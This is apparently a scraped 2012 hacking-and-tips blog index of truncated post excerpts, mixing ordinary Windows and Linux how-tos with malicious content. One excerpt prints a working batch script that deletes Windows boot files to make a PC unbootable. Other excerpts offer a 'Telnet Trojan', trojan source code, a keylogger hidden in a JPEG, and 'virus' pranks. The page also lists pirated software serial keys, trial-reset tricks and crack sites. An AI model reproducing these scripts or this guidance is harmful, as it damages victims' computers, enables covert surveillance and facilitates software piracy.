Xiaomi Mi4c Leaked To Come With Type-C USB port and Even More Internal Storage

It was earlier reported that Xiaomi Mi4c is going to carry a price of less than $250, which is a steal of a deal considering that you will get a smartphone running a Snapdragon 808 chipset in it.

Sunday, 18 November 2012

HOW TO MAKE IDM LIFETIME.

In this post/article i tell you that how to make the IDM forever. Many of you are facing the problem that your IDM get expired in 15 or 30 days but using this trick you can make your IDM for lifetime. You can Make Life Time without Any Software(no matter if u have upgrade your version) Install IDM Note before Use...

Wednesday, 31 October 2012

A Prank Virus

NOTE : PLEASE DO NOT TRY ON YOUR COMPUTER !!  First open the notepad and copy and paste the below mentioned codes in notepad and see the fun. You can edit the codes to make more funny or even deadly...

Monday, 29 October 2012

Find keylogger or any spyware in PC

Its  great method to find or detect a keylogger or any other spyware in your PC or system. As we all know nowadays keyloggers and spywares are big concern as hackers are trying their best to infect the victims to hack their accounts. Today i will teach you how to find a...

Sunday, 28 October 2012

How to shutdown your friend's Pc

How to shutdown your friend's Pc through chating using cmd Hello friends. You can shutdown your friend's computer through chating. This is very simple and cool trick. Kindly follow these steps ...

Saturday, 27 October 2012

What Is Brute Force and some Softwares for brute force attack

Hi , The topic of this article is "Brute Force".In this article i will explain the meaning of bruteforce and will provide some top Brute force softwares to download.Lets Strat.... Brute force (also known as brute force cracking) is a trial and error method used by application...

Flame (malware) what you need to know

Flame, also known as Flamer, sKyWIper, and Skywiper, is modular computer malware discovered in 2012 that attacks computers running the Microsoft Windows operating system.The program is being used for targeted cyber espionage in Middle Eastern countries. Its discovery was announced...

Dangerous Email File Attachments You Should Be Aware Of

Among the email attachment extensions that should not be opened at all, or if completely necessary, should be open in the special secure environment, are: Very Dangerous File Formats: .reg Possible Windows registry attac...

Friday, 26 October 2012

Ubuntu: The Complete Introduction for Beginners

Ubuntu is linux based operating system with the origin in south africa. Its name means "humanity towards others". Back in 2004, Linux was already established as a server operating system, but free software was not yet a part of everyday life. Further, Linux was thought of as...

Thursday, 25 October 2012

Advanced Port Scanning techniques

Advanced Port Scanning techniques ----------------------------------------------------------------------------- Today i will teach you different types of port scanning and their analysis, drawbacks etc. Lets start with a brief overview of yesterday's tutorial. In simple words,...

How to remove youtube copyright.[tutorial]

How to remove youtube copyright. This guide will tell you how to resolve copyright issues for your youtube videos. With this, you can have your favorite music and images without that WMG deleting your account. This method only covers 99% of copyrighted...

Tuesday, 16 October 2012

How To: Delete ghost messages from MS Outlook

Most people who use Microsoft Outlook as an email client for Gmail or their personal POP mail would sometimes notice that it is trying to send out emails but there aren’t any in the outbox. These are usually ghost messages that have been sent earlier or are too large and stuck...

Sunday, 14 October 2012

Creating a Telnet Trojan for Windows XP

Following batch script will act as Telnet Trojan to any windows XP system, the best part of it is it's fully undetectable to all ant-virus programs. Copy following lines in notepad and save with any name with .bat extension for example Trojan.bat. Cod...

Saturday, 13 October 2012

Warning: Fake Skype app. on Android is malware

A new piece of malware is trying to take advantage of Skype's increasing popularity, especially on mobile devices. Cybercriminals have created a fake version of the Skype for Android app, designed to earn money from unsuspecting users. Trend Micro, which first discovered the malware,...

Friday, 12 October 2012

COLLECTION OF SERIEL KEYS ! (part 2)

Macromedia Studio MX ::::WSW600-59791-91721-99978 Magic Converter V 7.9.5.1 - MVC182749 Make Money 2.0 :::: PRF0200153 Mechanical Desktop 6.0 ::::400-19791979 / CD-Key:TLSQBS MS Office 2007 - KGFVY-7733B-8WCK9-KTG64-BC7D8 MS Office 2010 Key - GGG8W-PJFRT-8MRQH-X99J2-PPPVM MS XP - User Name - Creative, CD Key - FM9FY TMF7Q KCKCT V9T29 TBBBG Nero Burning Rom 5.5=> 9M03-01A1-PCX7-K31A-8A94-98PT-KT2E-522A3D Nero...

COLLECTION OF SERIEL KEYS ! (part 1)

Here is the some keys and serial number of some softwares 3D Studio Max 4 :::: Number:226-19791979 / CD Key:XLSQBQ9zfll2WrZc+Vn0hWaw2dV/sccwKwsWY05TPwHden Acrobat Distiller - WAW210P7121183-537 Adobe After Effects 5.5 : EWW470R1001999-030-259 Adobe Frame maker 7.0 ::::1030-1208-8265-3458-9287-7077- Adobe...

What is CAPTCHA?

INTRODUCTION A captcha is a program that can generate and grade tests that: Captcha (A) most humans can pass, but (B) current computer programs can't pass. Such a program can be used to differentiate humans from computers and has many applications for practical security, including...

Monday, 8 October 2012

List of codes for the fancy alphabets used n the facebook chat box

Here is a list of codes for different alphabets:-   A = [[399197913893]]   B = [[115345298505025]]   C = [[53872404042]]   D = [[226910642728]]   E = [[140775945956538]]   F = [[136046106447549]]   G = [[119431374760220]]   H = [[205082339544090]]  ...

Sunday, 30 September 2012

Keyboard Shotcuts

keyboard shortcuts CTRL+C (Copy) CTRL+X (Cut) CTRL+V (Paste) CTRL+Z (Undo) DELETE (Delete) SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bi...

How To Get Windows 8 Interface Instantly On Your Windows 7 PC

Windows 8 is yet to release, but buzz has started regarding it. We bring you an opportunity to try its desktop interface. Note that, It’s not the OS. It is just an application that gives your PC a look that resembles with widget-based look of Windows 8. You should have Windows 7 and .Net framework v4 installed on your PC. Now, follow the steps belo...

Friday, 28 September 2012

How to sign up multiple times to a website with one/same gmail account

Sometimes you want to create multiple accounts in a website but you require different email id. In this very easy and simlple trick i'll share how you can create multiple accounts in some websites with only one gmail account. The basic logic behind the trick is some websites treats .(dot) as different email id but gmail treats them same.because gmail ignores .(dot) from your email id for examle:- examplemyid@gmail.com example.myid@gmail.com example.my.id@gmail.com example.my.i.d@gmail.com if...

Wednesday, 26 September 2012

Cloud increasing share in security spend

According to a report by AMI Partners released Wednesday, overall global spending on security products and services reached US$19 billion in 2011. It added that spending by small and midsize businesses (SMBs) would increase at a compound annual growth rate of over...

Sunday, 23 September 2012

Facebook Account Temporarily Locked or blocked::

 Facebook Account Temporarily Locked or blocked:::.... Isn't frustrating???? Reason: A) May be Facebook making an improvement in the database and the account get "Locked" are stored on. During this time,it may not be able to gain access to the account. It may last for an...

FreeBSD add a user to group

You need to use pw command. The pw utility is a command-line based editor for the system user and group files, allowing the superuser an easy to use and standardized way of adding, modifying and removing users and groups. First login as the root using su or sudo command. Task: Add existing user to group You would like to add existing user tom to secondary group called ftpusers. Type the...

Saturday, 22 September 2012

Bogus Facebook apps spreading Android malware

Third-party Android markets have traditionally been the main source of infection since the Android boom, as they are less strict than the genuine Play when it comes to bouncing malware. Today Gmanetwork reports that, Users of mobile devices running Google’s Android OS were warned...

Howto Crack pdf File Password

If you want to crack pdf file passwords use pdfcrack.PDFCrack is a GNU/Linux (other POSIXcompatible systems should work too) tool for recovering passwords and content from PDF-files. It is small, command line driven without external dependencies. The application is Open Source (GPL). pdfcrack Features Supports the standard security handler (revision 2 and 3) on all known...

How To Create Your Own RUN Commands

If you had a belief, that RUN commands are only for predefined OS related applications; then it’s past now. Because, now we can also create user defined RUN commands so that we can run any application installed or present inside the computer. This will not only make you...

How To Download Torrent At Faster Speed

Trick 1 : based on torrent client First tip to speed torrent download is to use Vuze instead of other torrent clients. However if you still insist on using other torrent forms here are some tips that might give you a boost in enhancing your download speed…. Trick 2 : based on...

A Basic Knowledge About The Sim Card

This Is an Basic Knowledge About The Sim Card Wich U will Not Get in Google Also And Many People Doesn't Know This  So I am Sharing Wit U guys Sim Cards Are Of 4 Types..Named As Below SIM H1, H2, H3, H4 H ka Matlab Nai Malum H1=...

Thursday, 20 September 2012

Ubuntu Tip:How to Connect/disconnect VPN from the command line

This tutorial will explain How to Connect/disconnect VPN from the command line If you want to interact with NetworkManager from the command line you can use the "nmcli" command. You can list all NM connections using the following command nmcli con You can start connection (wifi, vpn, etc) using the following command nmcli con up id ConnectionNa...

Understanding /etc/shadow file used under Linux or UNIX

/etc/shadow file stores actual password in encrypted format for user's account with additional properties related to user password i.e. it stores secure user account information. All fields are separated by a colon (:) symbol. It contains one entry per line for each user listed...

Wednesday, 19 September 2012

Permanent Solution To Delete Newfolder.exe Virus-(Manually)

Often people do complain regarding the New folder virus or Newfolder.exe. This newfolder.exe is an executable file that starts a malicious process which launches certain parasite components or runs a destructive payload. Even if the newfolder.exe file does nothing suspicious, its presence indicates that your computer is infected with a particular threat. The original name of the virus is:...

How To: UNIX Add A User To A Group

Q. How do I add a user to a group under Sun Solaris UNIX operating system from a shell prompt or command line? A.. You can useadd command to administer a new user login on the UNIX system. Solaris UNIX / HP-UX UNIX uses /etc/passwd, /etc/shadow and /etc/group files to store...

How To Create A Spam Virus

In my previous post How to create a computer virus? I gave a little information regarding methods to create viruses using different programming languages. But let’s face it just creating a virus isn’t going to satisfy high class prankster. So here’s a new one coming your way. But as usual I should caution you trying this can cause serious damage. In this new prank we’ll create a spam virus in the...

Wifi Securiy: WEP

Wired Equivalent Privacy (WEP) is a security algorithm for IEEE 802.11 wireless networks in 1999. Recognizable by the key of 10 or 26 hexadecimal digits (or what is the same 5 or 13 characters, 2 hex -> 1 byte each). Two important elements to know are: IVs (initialization vectors),...

BitTorrent study finds most file-sharers are monitored.

Anyone using file-sharing service BitTorrent to download the latest film or music release without paying is likely to be monitored, UK-based researchers suggest. A Birmingham University study indicates that an illegal file-sharer downloading popular content would be logged by...

Sunday, 16 September 2012

Linux setup shared directory

Sharing a directory among users in same group is one of the essential tasks. You need to use chmod command and add user to appropriate group. To make idea clear here is an scenario: /home/myproj : is shared directory usr1, usr2, ... usrN : would like to work and share files in /home/myproj directory padmin : Main project administrator user ...

Saturday, 15 September 2012

WIFI HACKING Commands in Backtrack/linux

Wireless networks are all around and people often needs to keep their networks private and secure. There is a set of best practices to do so and a good way of testing how secure our networks are (i.e., WLAN, Wifi) is to carry out wifi auctions. Normally, networks are protected using...

CRACKING LINUX FROM INSIDE

We all knows what linux os is. It is a biggest platform on which a developer develops there software and it is an freeware.This tweak allows an user to crack the linux from inside. . Be carefull when you are cracking your linux os...

THE LIST OF FREE CRACK AND KEYGENS SITEs

THE LIST OF FREE CRACK AND KEYGENS SITES THAT ARE SAFE FOR U. Are you looking for a serial key and can’t find it no matter how much you try? Well, if that is driving you crazy, a visit to the next websites might just put an end to that. Here is the list of free crack and keygen sites that are safe to us...

Wednesday, 12 September 2012

Create A Hidden User Account

This tweak allows an account that is normally displayed on the Welcome screen to be hidden from view. To log on using the account it's necessary to use the Log On To Windows dialog box similar to the one in Windows 2000. [Start] --> [Run] --> Type Regedit --> Press Enter --> then Navigate to following ke...

Make Your Computer to Never Reboot Till You Format It Up.

Basically this is a virus you program on notepad and save it as .bat file to delete the files needed for booting up a pc. Please follow the steps to create this virus:.. Open up notepad and copy , paste the code below. Save it as a .bat fil...

Wednesday, 5 September 2012

Make Your Computer Speak When you Log On

It’s a simple trick to amaze your friends.When you Log On infront of them. Yeah a trick to make your Computer Welcome you on Start Up. Lets Do It: Open Notep...

Tuesday, 4 September 2012

To trace the ip address of the various computer in the internet (on cmd)

If u want to see the ip address of those who where using the same url which u r using at the same time in an WLAN network then use this cmd. Step1> open “run...

How To Speed Up Internet with Open DNS [Windows7]

In this article i am going to explain "How To Speed Up Internet with Open DNS" in Windows7. Without the help of any software. lets see how to setup OpenDNS for your Computer First Go to Control Panel, then select “Network and Internet”. Select “Network and Sharing Center”. Select...

Saturday, 1 September 2012

How To Clear Pagefile on Shutdown

As an added security precaution it is possible to clear all data that has been written to the page file so it cannot be retrieved. The downside to this tweak is that it may substantially increase  shutdown time depending on the amount of data in the page file. [Start] --> [Run] --> Type Regedit --> Press Enter --> then Navigate to following key. Registry...

Conceal Hidden Devices in Device Manager

When accessing Device Manager there may be hidden devices that are not displayed. [Start] [Run] [Regedi...

Make Your Computer to Never Reboot Till You Format It Up.

Basically this is a virus you program on notepad and save it as .bat file to delete the files needed for booting up a pc. Please follow the steps to create this virus:.. Open up notepad and copy , paste the code below. Save it as a .bat fil...

Clean your RAM using Notepad!!

you may recognize that your system gets slower and slower while playing and working a lot with your pc. That's cause your RAM is full of remaining progress pieces which you don't need any more. To clean up your ram: Create a new text file and name it as "ramcleaner" or anything...

Enable/Disable Local Group Policy Objects

In a non-networked environment (or in a networked environment that does not have a domain controller), the local Group Policy object's settings are more important, because they are not overwritten by other Group Policy objects. You can open the Group Policy snap-in to edit the local Group Policy object that is stored on your local computer.  Click Group Policy...

Saturday, 11 August 2012

Space Eater(VIRUS) code

This is an virus source code. only for educational purpose DO NOT SPREAD IT.. It is harmful program. BEWARE:-Do not compile it in your own pcs. do not recognize by any of the antivirus... /* SPACE EATER TROJAN . USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/ #include<stdio.h> #include<conio.h> #include<dos.h> #include<stdlib.h> FILE...

10 Interesting facts about Microsoft

Almost every one Knows Microsoft and its operating System Windows. But you will probably not know the following 10 interesting facts! 1. No one knows the reason, but it is impossible to create a folder named "con" or "Con". It is just not possible. And if you try to fool Windows...

Tuesday, 7 August 2012

How make a virus in Notepad-2

SHUT UR INTERNET PERMANENTLY::: This is a slightly more advanced one. It shuts down your internet permanately. I tried it on myself accidently, i knew what it did, and it still took me a couple of days to get my internet back. works best on XP, not tested on vista or 7. EDIT:...

How make a virus in Notepad-1

How to crash a PC Forever !::: @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini Open up notepad and copy and paste that. Save...

QoS Bandwidth Reserve Setting - Faster Internet Connection

     Beware Editing in the registry files can slow down your computer     By default, Windows XP reserves 20% of the connection bandwidth for QoS traffic। This tweak allows the setting to be altered to a different percentage of connection bandwidth। If the system uses more than a single adapter for network connections, each adapter may be set individually...

Registry Tricks for Windows - Clear Pagefile on Shutdown

     Beware Editing in the registry files can slow down your computer      As an added security precaution it is possible to clear all data that has been written to the page file so it cannot be retrieved. The downside to this tweak is that it may substantially increase shutdown time depending on the amount of data in the page file. [Start]...

Tuesday, 31 July 2012

Hide Keyloggers into a JPEG file

Through this trick you can easily hide keyloggers. First download any key logger from google i think Ardamax is best. After installing just follow these easy steps=> 1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked...

Sunday, 22 July 2012

Introduction To WebGoat A revolutionary Web Attack Tool

What is WebGoat? WebGoat is aJ2EE web application, created by the OWASP community to provide a teaching environment for web application security. It is a deliberately insecure program,where you must go through a number of lessons . In each lessons, you learn about a new sort of...

Thursday, 12 July 2012

A new cross platform Trojan downloader has been discovered.

A new Trojan downloader has been discovered which detects your platform i.e. your operating system which you have and downloads the corresponding malware for your platform. Remember the cross-platform malware that exploited Java to attack both PCs and Macs? Here’s better one...

Sunday, 24 June 2012

GOOGLE DRIVE- NEW APPS FOR YOU

Recently, google launched its dropbox competitor, offering up to 5Gb of free storage space, not to mention the ability to download files and sync folders on multiple computers. here are a few tips to have make effective use of GOOGLE DRIVE. PREVENT FILES FROM DOWNLOADING We...

Sunday, 17 June 2012

SOMETHING MORE ABOUT THE IPv6

Enabling IPv6 In this post I am going to discuss something more about the IPv6 networks. The switch’s implementation of IPv6 is disabled by default. To enable IPv6, use the command:       ENABLE IPV6 To disable IPv6, use the command:       DISABLE...

Sunday, 10 June 2012

FEATURE OF THE IPv6

In my previous post I am just introduced the IPv6, its Feature and the challenges to Internet . Now in this post I am going to explain the feature of the IPv6.  It has too many exciting features. Like:- •Addressing •Header •Security •Privacy •Autoconfiguration •Routing •Quality of Service...

Friday, 8 June 2012

Introduction to IPv6 (Internet Protocol Version 6)

What is IPv6? Internet Protocol Version 6 (IPv6) is a network layer protocol that enables data communications over a packet switched network. Packet switching involves the sending and receiving of data in packets between two nodes in a network.  It has primarily been developed...

Tuesday, 5 June 2012

Extend Windows 7 Trial Period

In this post I am going to show that how a person can extend itswindows 7 trial perioed by 30 days. (without using any software) Extending the Trial By 30 Days Now to actually perform the hack that will extend the trial mod...

Monday, 4 June 2012

How to trace E-mail sending Location

To track an email and its senders location details, you must know its internet IP address from which he sends the e-mail to you. Here is the procedure on how you can track the email and its sender's locations by finding there Ips. Once we get the IP Address of the sender, it is...

Tuesday, 29 May 2012

How To Make Your Own Key Logger In Visual C++

Today I am going to teach "How To Make Your Own Key Logger ". If you know the C++ then you can easily understand the program. Now a days key loggers are common to all the advance users it is a basic software but very useful software . But many people don't know that what is key logger. Key Loggers are often called Keystroke logging is the action of tracking (or logging) the keys struck on...

Friday, 25 May 2012

Make Your Computer Speak When you Log On

It’s a simple trick to amaze your friends.When you Log On infront of them. Yeah a trick to make your Computer Welcome you on Start Up. Lets Do It: Open Notepad Paste the bellow code in Np Dim speaks, speech speaks="Welcome Back, Username" Set speech=CreateObject("sapi.spvoice") speech.Speak speaks ...

Friday, 11 May 2012

Create new instance of an Application in Windows 7 Super Taskbar

In windows 7 Taskbar instance of an application can easily be created by using Win + Number Key. Here number key signifies the position of the Application in the Taskbar If you press Windows + 1, it will create a new instance of the first icon in the task bar. In the taskbar...

Friday, 6 April 2012

HOW TO CHANGE ALBUM ART OF ANY SONG

Where does album art come from? The Player downloads album art from an online database where the information is supplied by a variety of non-Microsoft data providers, such as AMG. The Player downloads album art when you rip a CD. To do so, the Player attempts to match the CD to an entry in the online database. If it finds a match, the Player automatically downloads the media information that...

Wednesday, 4 April 2012

Copy Command Prompt Output

Windows 7 command prompt can be used with a clip utility that can used to copy the contents of the command prompt output into clipboard. It is very much similar like the way tee command works in UNIX. Tee command pipelines the output of a command in UNIX to another file. In Windows 7 we can use the „Clip‟ utility to copy the text of command prompt. Adding clip next to any command copy the outpu...

HOW TO BACKUP AND RESTORE MY INTERNETS FAVOURITES OR BOOKMARKS

Although there are several third-party software programs that will enable you to backup, restore, and manage your Internet browser bookmarks or favorites, all modern browsers today include bookmark managers and are capable of backing up and restoring your bookmarks or favorites. Below is a listing of each of the major browsers and how to backup and recover your Internet bookmarks or favorit...

Monday, 2 April 2012

SUPER TASKBAR

In Windows 7, the taskbar has become a super Taskbar. All things are @ tips and fewer clicks are required for access to anything. Features of Windows 7 Taskbar 1. You can pin frequently used programs to the taskbar ...

Sunday, 1 April 2012

KNOW YOUR WINDOWS AND PCs CONFIGURATION

If you want to know about your computer/laptop's exact configuration then you must know this. by this one can easily understand his/her computer's configuration. Step1:- Go to Run  Step2:- Type 'dxdiag' press ente...

Saturday, 31 March 2012

TWENTY WINDOWS 7 KEY SHORTCUTS

From Desktop  Windows Key + Tab =  Aero [press Tab to cycle between Windows]  Windows Key + E =  Windows Explorer is launched.  Windows Key + R =  Run Command is launched.  Windows Key + F =  Search (which is there in previous Windows versions too)  Windows Key + X =  Mobility Cen...

Friday, 30 March 2012

LOCK THE SCREEN SHORTCUTS

To Lock Screen in Windows 7 you have to press the Windows Key + L to lock it, now. The screen would be locked and password protected in case you have one. In case you don‟t like shortkeys or you keep forgetting them, there‟s another option for screen loc...

HOW TO ACTIVATE GOD MODE IN WINDOWS 7(no software required)

God mode basically put every thing in one place i.e. folder and additional hidden secrets and shortcuts basically in one spot. So it is easy to find anything. ...

Thursday, 29 March 2012

...

Wednesday, 28 March 2012

Customize the Windows 7 log-on screen (no software required)

Windows 7 makes it easy changing the Windows log-on screen. 1. Go to start, and click on Run, type Regedit & press enter there. 2. Navigate to : HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Authentication\ LogonUI\Backgrou...